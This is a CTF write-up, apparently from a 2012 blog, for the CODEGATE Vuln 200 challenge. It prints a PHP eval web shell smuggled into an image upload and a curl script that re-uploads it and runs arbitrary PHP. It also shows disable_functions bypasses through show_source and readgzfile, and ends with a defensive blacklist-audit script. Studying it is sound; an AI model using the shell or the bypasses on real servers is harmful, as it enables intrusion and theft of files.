26 Feb 2012

CODEGATE 2012 – Vuln 200

Get a shell if you can!

This is a web application where you can upload an image. Cute. We tried uploading a JPG file with a PHP payload appended and called it kittens.jpg.php, and lo and behold, it worked! 🙂

kittens.jpg.php:

/*JPEG DATA*/<?php eval($_GET['x']); ?>

Our PHP shell kept disappearing, so we wrapped it in a script that would upload a fresh one for every request. 🙂

code.sh:

#!/bin/sh
# Upload a fresh copy of the shell and pull the stored filename out of the
# upload reply (field 19 when split on double quotes), dropping the escaped
# backslashes the reply contains.
FILENAME=`
  curl -s -F "file=@kittens.jpg.php" http://1.234.41.9/1olOI01/upload.php |
  awk -F '"' '{ print $19 }' |
  sed -e 's/\\\\//g'
`
# The PHP to run comes in as the first argument; the START marker is what
# lets us cut the JPEG bytes off the front of the response below.
DATA=`echo "echo 'START'; $1"|base64 -w 9000`
URL="http://1.234.41.9/1olOI01/images/${FILENAME}"
curl -s --data-urlencode x=${DATA} "${URL}" | strings | grep -A999 "START"

$ ./code.sh 'echo ini_get("disable_functions");'
basename,chgrp,chmod,chown,clearstatcache,copy,delete,dirname,disk_free_space,disk_total_space,diskfreespace,
fclose,feof,fflush,fgetc,fgetcsv,fgets,fgetss,file_exists,file_get_contents,file_put_contents,file,fileatime,filectime,
filegroup,fileinode,filemtime,fileowner,fileperms,filesize,filetype,flock,fnmatch,fopen,fpassthru,fputcsv,fputs,fread,
fscanf,fseek,fstat,ftell,ftruncate,fwrite,glob,is_dir,is_executable,is_file,is_link,is_readable,is_writable,is_writeable,
lchgrp,lchown,link,linkinfo,lstat,mkdir,parse_ini_file,parse_ini_string,pathinfo,pclose,popen,readfile,readlink,
realpath_cache_get,realpath_cache_size,realpath,rename,rewind,rmdir,set_file_buffer,stat,symlink,tempnam,
tmpfile,touch,umask,unlink

That’s a lot of disabled routines! Luckily, we can at least traverse the filesystem using opendir()/readdir(), so after a while we run into:

$ ./code.sh '$dh=opendir("..\\\\..\\\\..\\\\Users\\\\codegate2\\\\Desktop\\\\"); while($f=readdir($dh)) echo $f."\n";'
START.
APMSETUP Monitor.lnk
Codegate 2012 Key.txt
desktop.ini

Now how do we read this magic txt file? file_get_contents() and fopen() are blacklisted. Then I remembered function aliases: show_source() (an alias of highlight_file()) is *not* blacklisted. 🙂

$ ./code.sh 'var_dump(show_source("..\\\\..\\\\..\\\\Users\\\\codegate2\\\\Desktop\\\\Codegate 2012 Key.txt"));'
START<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?
<br /></span><span style="color: #FF8000">/*
<br />Good&nbsp;Job&nbsp;!
<br />
<br />Key&nbsp;is&nbsp;16b7a4c5162d4dee6a0a6286cd475dfb
<br />*/
<br /></span><span style="color: #0000BB">?&gt;</span>
</span>
</code>bool(true)

Flag: 16b7a4c5162d4dee6a0a6286cd475dfb

One Response to “CODEGATE 2012 – Vuln 200”

  1. Hi, cool writeup guys!

    We used readgzfile() function to bypass file_get_contents() filter and allow us to show file content.

    Hf.
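The lesson from the alias trick above and from the readgzfile() comment is that a disable_functions blacklist is only as good as its coverage. The following config-audit check is an added example (not code from the writeup): it flags blacklisted routines whose documented PHP alias is still callable, and readers or directory walkers the list never mentions; scandir() is included beyond what the writeup names, and the embedded list is a constructed excerpt of the value dumped above.

```python
"""Audit a php.ini disable_functions value for the gaps this writeup walks
through: a blacklisted routine whose PHP alias is still callable, and file
readers or directory walkers that the blacklist never mentions."""

# Documented PHP aliases (two names for one routine). Disabling only one
# name of a pair leaves the other callable.
ALIASES = [
    ("show_source", "highlight_file"),
    ("is_writeable", "is_writable"),
    ("diskfreespace", "disk_free_space"),
    ("fputs", "fwrite"),
    ("set_file_buffer", "stream_set_write_buffer"),
]

# Other routes to file contents or directory listings: readgzfile() is the
# one named in the reader comment, opendir()/readdir() are the walkers the
# writeup uses, scandir() is the third standard directory lister (assumed
# relevant here, not mentioned on the page).
OTHER_READERS = ["show_source", "highlight_file", "readgzfile",
                 "opendir", "readdir", "scandir"]

# Constructed excerpt of the disable_functions value the writeup dumped.
WRITEUP_LIST = ("fopen,file_get_contents,file,readfile,fread,fputs,fwrite,"
                "diskfreespace,disk_free_space,is_writable,is_writeable,"
                "set_file_buffer,popen,unlink")


def parse_disable_functions(value):
    """Split the ini value into a set of lowercase names (PHP function
    names are case-insensitive, so compare them lowercased)."""
    return {name.strip().lower() for name in value.split(",") if name.strip()}


def audit(value):
    """Return (alias_gaps, uncovered): alias_gaps lists (disabled, callable)
    pairs where one alias is blacklisted and the other is not; uncovered
    lists readers/walkers absent from the blacklist entirely."""
    disabled = parse_disable_functions(value)
    alias_gaps = []
    for a, b in ALIASES:
        if a in disabled and b not in disabled:
            alias_gaps.append((a, b))
        elif b in disabled and a not in disabled:
            alias_gaps.append((b, a))
    uncovered = [name for name in OTHER_READERS if name not in disabled]
    return alias_gaps, uncovered


if __name__ == "__main__":
    gaps, missing = audit(WRITEUP_LIST)
    for disabled_name, callable_name in gaps:
        print(f"{disabled_name} is disabled but its alias {callable_name} is not")
    for name in missing:
        print(f"{name} is not in disable_functions")
```

Run against the excerpt, it reports set_file_buffer as disabled while its alias stream_set_write_buffer is not, plus every entry of OTHER_READERS as uncovered.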